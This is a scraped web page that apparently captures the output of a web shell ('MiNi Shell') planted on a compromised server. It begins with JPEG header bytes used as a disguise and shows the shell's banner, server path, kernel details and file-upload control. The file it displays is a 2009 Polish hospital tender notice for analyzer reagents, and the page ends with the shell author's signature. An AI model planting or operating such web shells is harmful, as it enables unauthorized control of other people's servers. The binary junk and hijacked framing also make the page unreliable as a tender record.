JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090421/114372-N-2009.html

<p class="kh_header"><b>Bielsko-Biała: Dostawa odczynników oraz materiałów zużywalnych wraz z dzierżawą (1) jednego analizatora parametrów krytycznych dla poptrzeb oddziału AiIT Szpitala Ogólnego im. dr Edmunda Wojtyły w Bielsku-Białej w okresie trwania umowy(jednego) roku. Numer Sprawy: ZP 10/2009-PN.</b><br>
<b>Numer ogłoszenia: 114372 - 2009; data zamieszczenia: 21.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Ogólny im. dr Edmunda Wojtyły , ul. Wyspiańskiego 26, 43-300 Bielsko-Biała, woj. śląskie, tel. 033 8272501, faks 033 8272505.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.bielsko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odczynników oraz materiałów zużywalnych wraz z dzierżawą (1) jednego analizatora parametrów krytycznych dla poptrzeb oddziału AiIT Szpitala Ogólnego im. dr Edmunda Wojtyły w Bielsku-Białej w okresie trwania umowy(jednego) roku. Numer Sprawy: ZP 10/2009-PN..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa odczynników  i materiałów zużywalnych wraz z analizatorem parametrów krytycznych, niezbędnych do wykonania 7 300 oznaczeń..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.10.00.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu Zamawiajacy nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:

    1. Spełniają warunki zawarte w art. 22 ust. 1 ustawy Prawo zamówień publicznych:
a.   posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy 
      nakładają obowiązek posiadania takich uprawnień, 
b.   posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i 
      osobami  zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie 
      innych podmiotów do udostępnienia potencjału  technicznego i osób zdolnych do 
      wykonania zamówienia,
c.    znajdują się w sytuacji ekonomicznej i finansowej za?pewniającej wykonanie zamówienia.

                2.  Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia z powodu okoliczności, o
                   których mowa  w art. 24 ust. 1 i 2,  oraz 
   
3. Spełnią  warunki dodatkowe, takie jak:
a)	potwierdzą stosownym oświadczeniem, iż zapoznali się z warunkami realizacji zamówienia, określonymi w specyfikacji   istotnych warunków zamówienia, oraz że przyjmują je bez zastrzeżeń - zał. 1SIWZ -  oferta,
b)	udokumentują stosownym wykazem  wykonanie, a ze względu na charakter zamówienia również wykonywane  dostawy w okresie ostatnich 3 lat, a jeżeli okres prowadzonej działalności jest krótszy , w tym okresie, odpowiadających  swoim rodzajem i wartością dostawom stanowiącym przedmiot  zamówienia, z podaniem ich   wartości, przedmiotu, dat wykonania i odbiorców, oraz przedstawi stosowne dokumenty ( np. referencje )  potwierdzające, że dostawy  te zostały wykonane  należycie lub, że są wykonywane  należycie.
                               Do każdego wykazanego zamówienia powinny być załączone dokumenty potwierdzające, 
                               że usługi te zostały wykonane należycie lub, że jest ono  wykonywane należycie. 
              Dla Zamawiającego warunkiem wystarczającym będzie wykazanie  co najmniej ( 2  )  
              dwa   zamówienia o charakterze zgodnym z przedmiotem naszego zamówienia i wartości 
              nie mniejszej niż  lub  równej  100 %  ceny ofertowej netto każda z podaniem ich 
              wartości, przedmiotu, dat wykonania i odbiorców wraz z  załączeniem dokumentów 
              potwierdzających ich należyte wykonanie.
c)	udokumentują posiadanie  aktualnego ubezpieczenia odpowiedzialności cywilnej z tytułu                        prowadzonej działalności gospodarczej i posiadania mienia  z sumą gwarancyjną   minimum 200 000,00  PL.
d)	zagwarantują zamawiającemu spełnienie nw. wymogów:
1)	Zagwarantuje  zamawiającemu  termin płatności lecz nie krótszy niż 30 dni od daty wpływu  właściwej faktury VAT do siedziby zamawiającego - zał. nr 1 SIWZ;
                   2)    Zaoferuje zamawiającemu stałość proponowanych cen Netto w okresie trwania umowy.
3)	Złoży pisemne  oświadczenie o zapoznaniu się, akceptacji i przyjęciu bez zastrzeżeń  warunków zawartych w niniejszej specyfikacji wraz z jej załącznikami oraz zobowiąże się w przypadku wyboru ich oferty do zawarcia umowy w miejscu i terminie wyznaczonym przez zamawiającego. 
4)	Przedłoży aktualne  dokumenty i oświadczenia wymagane w Rozdziale IV, dział II SIWZ.
5)	Wraz z dostawą i montażem zapewnią  przeszkolenie personelu w zakresie prawidłowej  obsługi.
6)	Na czas trwania umowy zapewnią  serwis oraz przegląd aparatu na prawidłowe działanie minimum 12 miesięcy od  daty uruchomienia.
7)	Wygrywający przetarg  zapewni  zamawiającemu:
-    bezpłatną dostawę analizatora  wraz z jego montażem, 
                           -    uruchomienie potw. protokołem przekazania, 
                           -    szkolenie personelu potw.  protokołem  szkolenia 
                          -     serwis oraz przegląd  we własnym zakresie.
e)	złożą ważną i odpowiednio przygotowaną - zgodnie z zapisami SIWZ ofertę nie podlegającą odrzuceniu na  podstawie art. 89 ust.1.

Ocena spełnienia określonych wyżej warunków  zostanie dokonane na podstawie złożonych przez Wykonawcę dokumentów, w tym oświadczeń określonych w treści SIWZ , według zasady spełnia / nie spełnia oraz odnotowana  na druku ZP 17.
Wykonawca, który nie spełni warunków uprawniających do udziału w postępowaniu, o których mowa w pkt. 1,2,3 ppkt. b) i c) zostanie wykluczony z postępowania o udzielenie zamówienia publicznego, a jego oferta zostanie uznana za odrzuconą,  natomiast oferta Wykonawcy, który nie spełni warunków, o których mowa w pkt. 3 ppkt. a),e),d),e)  zostanie odrzucona..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> II.	Wykaz wymaganych dokumentów w tym oświadczenia, jakie należy złożyć w postępowaniu:

1.	Wypełniony formularz ofertowy, który stanowi załącznik nr 1 siwz.
2.	Wypełniony formularz cenowy - wg wzoru stanowiącego załącznik nr 1A do ofert. 
3.	Parametry graniczne wymagane  dla analizatora - wg wzoru stanowiącego załącznik nr 4 SIWZ 
4.	Oświadczenie  o spełnieniu przez Wykonawcę  warunków udziału w postępowaniu, o których mowa w  Art. 22 ust. 1 pkt.1- 10 i ust. 2 pkt. 1-4 ustawy -wg wzoru stanowiącego załącznik nr 2 siwz
5.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności
                              gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru  lub zgłoszenia do ewidencji 
                              działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania  ofert.
6.	Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo
      reprezentowania Wykonawcy w postępowaniu i  zawarcia umowy w sprawie zamówienia publicznego-            
      udzielone osobom nie wymienionym w dokumencie, o który mowa w pkt. 4, a reprezentującym Wykonawcę,                  
      w szczególności poprzez podpisywanie/ poświadczenie dokumentów składających się na ofertę oraz innych  
      składanych w toku postępowania - w oryginale podpisane przez osobę uprawnioną lub  notarialnie.
7.	Aktualna polisa lub inny dokument , potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności 
                              cywilnej w zakresie prowadzonej działalności gospodarczej i posiadania mienia na  kwotę minim. 200 000,00 zł.
8.	Wykaz wykonanych, a ze względu na charakter zamówienia również wykonywanych usług w okresie ostatnich 3
      lat kalendarzowych przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia
      działalności jest krótszy -w tym okresie, co najmniej (2) dwa  zamówienia o charakterze zgodnym z przedmiotem
      naszego zamówienia odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot 
      zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz przedstawią stosowne 
      dokumenty ( np.referencje)  stwierdzające, że usługi te zostały wykonane należycie lub, że są wykonywane 
      należycie - wg wzoru  stanowiącego załącznik nr 3 siwz.
                              Wykonawcy występujący wspólnie  składają w/w wykaz  każdy oddzielnie. W takim przypadku   Zamawiający 
                              uzna, że wymóg zostanie spełniony, jeżeli suma takich dostaw wykazanych przez Wykonawców występujących 
                              wspólnie będzie nie mniejsza niż 2.
9.	Oświadczenie  własne Wykonawcy o spełnieniu wymogów określonych w warunkach uprawniających do udziału w  postępowaniu - litera d) od 1) do 7).
10.	Oświadczenie własne Wykonawcy, potwierdzające, że stosowane odczynniki, elektrody, sensory, materiały zużywalne podlegają /nie podlegają* przepisom  Ustawy o Wyrobach Medycznych i Produktów Biobójczych.
Wykonawca  wraz z ofertą ( dla proponowanego Analizatora ) zgodnie z ustawą o Wyrobach medycznych z dnia 20.04.2004r. przedstawi deklarację zgodności CE lub wpis do rejestru wyrobów medycznych.
                              Deklarację zgodności należy przedstawić w postaci potwierdzonej kserokopii oryginału, oraz  jej tłumaczenie na 
                              język polski.
                             W przypadku produktów, które nie podlegają przepisom cytowanej wyżej ustawy z dnia 20 kwietnia  2004r. 
                             o Wyrobach Medycznych, Wykonawca zobowiązany jest  dołączyć do oferty inne niż wyżej wymienione 
                             odpowiednie dokumenty dopuszczające te produkty do obrotu i stosowania lub dołączą  stosowne oświadczenie.
Uwaga:
1)	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt.1).  składa  odpowiedni dokument lub dokumenty , wystawione zgodnie z prawem kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.

2)	Jeżeli w kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, których mowa w pkt. 2 zastępuje się je dokumentem zawierającym oświadczenie złożone przed  notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.szpital.bielsko.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Ogólny im. dr Edmunda Wojtyły w Bielsku-Białej , 43-300 Bielskoi-Biała, ul. Wyspiańskiego 26.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2009 godzina 10:00, miejsce: siedziba zamawiajacego- Sekretariat, Ip. przy ul. Wyspiańskiego 26..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com